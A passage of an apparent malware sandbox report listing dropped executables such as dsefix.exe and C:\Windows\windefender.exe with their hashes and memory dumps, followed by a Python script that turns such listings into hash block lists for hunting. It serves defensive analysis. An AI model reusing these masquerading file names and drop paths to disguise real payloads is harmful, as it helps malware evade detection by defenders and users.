SHA256 17ee7d514faca7c6575c0890607c3aefeac04633a9967df1fcc2ffcd263e01bb
SHA512 dd185774c80bba1ae829c13587d89acea3e4a80d88c4e3a7644ab9cf63029a809997e90b43c315b48c5d9b110309e6d45873fbcf3db93f546d567b9ece984bd5

memory/2888-1234-0x0000000000400000-0x0000000000AEA000-memory.dmp

\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe

MD5 fe380780b5c35bd6d54541791151c2be
SHA1 7fe3a583cf91474c733f85cebf3c857682e269e1
SHA256 b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53
SHA512 ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

memory/1760-1242-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1238-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1760-1254-0x0000000000400000-0x0000000000ECD000-memory.dmp

\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe

MD5 858bb0a3b4fa6a54586402e3ee117076
SHA1 997c31f043347883ea5ed2323a558b6cc5ea9c8e
SHA256 d97a7fc44bf341b9b2b2e65b46dab4f7d329afe15b4308b5aa56d5bfd7b99d35
SHA512 e8374b115f056b5d345c9b5f9c42b3d49e0640d7fad869448f686add6e52b783ecc7fd35ee15a67b944843491a91becf5b7c0bd5603eda01042dd2904c1ad8fd

memory/2260-1268-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

memory/2260-1270-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

memory/2260-1271-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

memory/2260-1272-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
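The dropped-file and memory-dump listing above is only useful for hunting once it is in a structured form. The following script is an added example (written for this page, not part of the sandbox's report or tooling) that parses the report's own layout: a path line, a blank line, then `MD5`/`SHA1`/`SHA256`/`SHA512` lines, interleaved with `memory/<pid>-<n>-<start>-<end>-memory.dmp` entries. The embedded sample is a constructed excerpt of entries copied from the listing; treating the middle number of a memory line as a sequence index is an assumption, as is the `.exe/.dll/.sys` filter used to pick out the dropped binaries.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt of the listing above, in the report's own layout.
SAMPLE = r"""
memory/2236-42-0x000000001BA50000-0x000000001BACC000-memory.dmp

memory/2616-465-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1c38721b3c88cae46ff360a9cae1c252
SHA1 456a9ea611bd198b99b75368eb87a47a6d965f2a
SHA256 c57f28924010286694a6dd6ffa7da2aeb71838e4f5f6eac80623f6969e0f8574
SHA512 d04775ccfb6bbf62b4f81c2066048635523bef0b6d18bb4affb8088e34a86bf0baafda6347429634d3fbd7462bad05a5cc4d030eda086e210cb69e28ba8ce6d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7e3d26d0c12841c73abeaac75d8d0dd
SHA1 59f837d364a00122cb874266f503162e7cdae161
SHA256 8bebbb03d232690315a6914ee28b18634bfb2d0ffc1b1240e6b629ff7a37afca
SHA512 2d6b20505d879204ba502575504467736a70bc2306013444204408c382fc6ec8f6ce7adc5dd3935b4c2eb0944caba1d2dd20bcf2fab038b4784e80c0a8a0065b

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
"""

# memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp ; <n> assumed to be a dump sequence index
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}  # hex digits


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)  # algo -> lowercase hex digest


@dataclass
class MemoryRegion:
    pid: int
    index: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_report(text: str):
    """Return (dropped files, memory regions). Any line that is neither a memory
    entry nor a hash line is taken as the path of the next dropped file."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            current = None
            regions.append(MemoryRegion(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            continue
        h = HASH_RE.match(line)
        if h:
            algo, digest = h[1], h[2].lower()
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current.path}")
            current.hashes[algo] = digest
            continue
        current = DroppedFile(path=line)
        files.append(current)
    return files, regions


def sha256_set(files) -> set:
    """Deduplicated SHA256 block list for hunting across other hosts."""
    return {f.hashes["SHA256"] for f in files if "SHA256" in f.hashes}


def rewritten_paths(files) -> dict:
    """Paths listed more than once with different content, i.e. files the sample
    rewrote during the run (the CryptnetUrlCache metadata entry above is one)."""
    seen = {}
    for f in files:
        seen.setdefault(f.path, set()).add(f.hashes.get("SHA256"))
    return {p: len(s) for p, s in seen.items() if len(s) > 1}


def executables(files):
    # Assumed filter: only the dropped binaries, not caches, logs or .tmp files.
    return [f for f in files if f.path.lower().endswith((".exe", ".dll", ".sys"))]


def lookup(files, digest: str):
    """Paths whose MD5/SHA1/SHA256/SHA512 equals the given digest (case-insensitive)."""
    digest = digest.lower()
    return [f.path for f in files if digest in f.hashes.values()]


if __name__ == "__main__":
    fs, rs = parse_report(SAMPLE)
    print(len(fs), "files,", len(rs), "memory regions")
    for r in rs:
        print(f"pid {r.pid} region {r.index}: {r.size:#x} bytes")
    print("rewritten:", rewritten_paths(fs))
    print("binaries:", [f.path for f in executables(fs)])
```

Feed the whole Files section of the report to `parse_report` and `sha256_set` gives a block list you can match against EDR file events; `rewritten_paths` separates files the sample churns on (cache metadata, logs) from one-shot drops; `executables` pulls out the payload set (`u25w.*.exe`, `patch.exe`, `dsefix.exe`, `injector.exe`, `windefender.exe`, the `Pictures\*.exe` drops) that deserves a static look and its own detections. The digest-length check catches truncated hashes copied out of a rendered page before they silently fail to match.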